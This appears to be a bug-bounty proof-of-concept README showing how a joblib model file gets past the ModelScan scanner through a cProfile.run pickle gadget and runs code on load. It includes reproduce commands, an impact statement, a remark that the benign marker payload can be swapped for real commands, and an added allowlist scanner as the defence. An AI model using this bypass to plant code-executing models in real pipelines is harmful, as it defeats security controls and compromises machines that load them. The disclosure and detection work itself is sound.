
ModelScan Bypass: Arbitrary Code Execution in .joblib via cProfile.run gadget

Proof-of-concept for a Huntr Model File Format report.

model.joblib runs code on joblib.load() while ModelScan reports it clean. The malicious __reduce__ uses cProfile.run, a code-executing stdlib callable that is not on ModelScan's PickleUnsafeOpScan denylist, and hides the command in a string argument the scanner never inspects.
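The root cause described above is a denylist: a scanner that only knows a fixed set of dangerous callables misses any stdlib gadget it has not enumerated, and never needs to look at the string argument to do so. The inverse check, an allowlist of modules a model file is expected to import, flags cProfile.run regardless of its argument. The following is an added example written for this page; it is not part of the PoC, of joblib, or of ModelScan. It walks the opcode stream with pickletools (never unpickling) and reports every GLOBAL / STACK_GLOBAL import outside an assumed allowlist. The sample inputs are constructed pickles that reference cProfile.run with the harmless argument "pass"; they are only inspected, never loaded.

```python
"""Allowlist check of pickle imports (added example, not the PoC's or ModelScan's code).

pickletools.genops parses opcodes without executing anything, so the file can
be inspected safely.  Every import the stream performs (GLOBAL in protocol <= 3,
STACK_GLOBAL in protocol >= 4) is compared against an allowlist of module
prefixes; anything else is reported, whatever arguments follow it.
"""
import collections
import io
import pickle
import pickletools

# Assumed allowlist: top-level modules a scikit-learn/joblib model legitimately needs.
ALLOWED_MODULE_PREFIXES = ("numpy", "sklearn", "joblib", "builtins", "copyreg", "collections")

# String-producing opcodes; STACK_GLOBAL takes module and name from the two most recent.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def pickle_imports(data: bytes) -> list:
    """Return (module, name) pairs for every import opcode in the pickle stream."""
    imports = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if opcode.name in STRING_OPS:
            recent_strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):
            # pickletools renders the argument as "module name"
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            module, name = recent_strings[-2], recent_strings[-1]
            imports.append((module, name))
    return imports


def unexpected_imports(data: bytes, allowed=ALLOWED_MODULE_PREFIXES) -> list:
    """Sorted 'module.name' strings whose top-level module is not allowlisted."""
    return sorted({f"{m}.{n}" for m, n in pickle_imports(data)
                   if m.split(".")[0] not in allowed})


def scan_file(path: str, allowed=ALLOWED_MODULE_PREFIXES) -> list:
    """Convenience wrapper: inspect a file on disk without loading it."""
    with open(path, "rb") as fh:
        return unexpected_imports(fh.read(), allowed)


# --- constructed samples (hand-written opcodes, never unpickled) ---------------
# protocol 2: PROTO, GLOBAL "cProfile run", SHORT_BINSTRING "pass", TUPLE1, REDUCE, STOP
SAMPLE_PROTO2 = b"\x80\x02ccProfile\nrun\nU\x04pass\x85R."
# protocol 4: PROTO, SHORT_BINUNICODE x2, STACK_GLOBAL, SHORT_BINUNICODE "pass", TUPLE1, REDUCE, STOP
SAMPLE_PROTO4 = b"\x80\x04\x8c\x08cProfile\x8c\x03run\x93\x8c\x04pass\x85R."
# benign objects produced by the real pickler: no imports, and an allowlisted import
BENIGN_DICT = pickle.dumps({"coef": [0.5, 1.0]}, protocol=4)
BENIGN_ORDEREDDICT = pickle.dumps(collections.OrderedDict(a=1), protocol=4)

if __name__ == "__main__":
    for label, blob in [("proto2 gadget", SAMPLE_PROTO2), ("proto4 gadget", SAMPLE_PROTO4),
                        ("plain dict", BENIGN_DICT), ("OrderedDict", BENIGN_ORDEREDDICT)]:
        print(f"{label:14s} imports={pickle_imports(blob)} unexpected={unexpected_imports(blob)}")
```

The check reads only the pickle stream. For an uncompressed joblib file that contains numpy arrays, joblib appends raw array bytes after each array wrapper inside the same stream, so a plain opcode walk stops at the first array; a joblib-aware reader (or scanning the pickled object graph that joblib itself parses) is needed there, and compressed joblib files must be decompressed first. The allowlist is an assumption for a scikit-learn model and should be narrowed to what a given pipeline actually ships.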

Files

  • model.joblib: the PoC model file (benign payload: writes modelscan_poc_executed.txt)
  • exploit.py: builds the model, scans it with ModelScan, loads it, prints the result

Reproduce

pip install joblib modelscan
# 1) scanner says it is safe:
modelscan -p model.joblib          # ->  No issues found! 🎉
# 2) loading it executes code:
python -c "import joblib; joblib.load('model.joblib')"
ls modelscan_poc_executed.txt      # marker proves code ran on load
# or run everything at once:
python exploit.py                  # -> No issues found (BYPASS) + CODE EXECUTED

Impact

ModelScan is used to gate untrusted models in MLOps pipelines / model hubs. This file passes the scan as clean yet achieves arbitrary code execution on load, defeating the control. Verified on modelscan 0.8.6 / joblib 1.5.3.

The payload here is benign (writes a marker file). Swap the command in exploit.py to confirm real command execution.
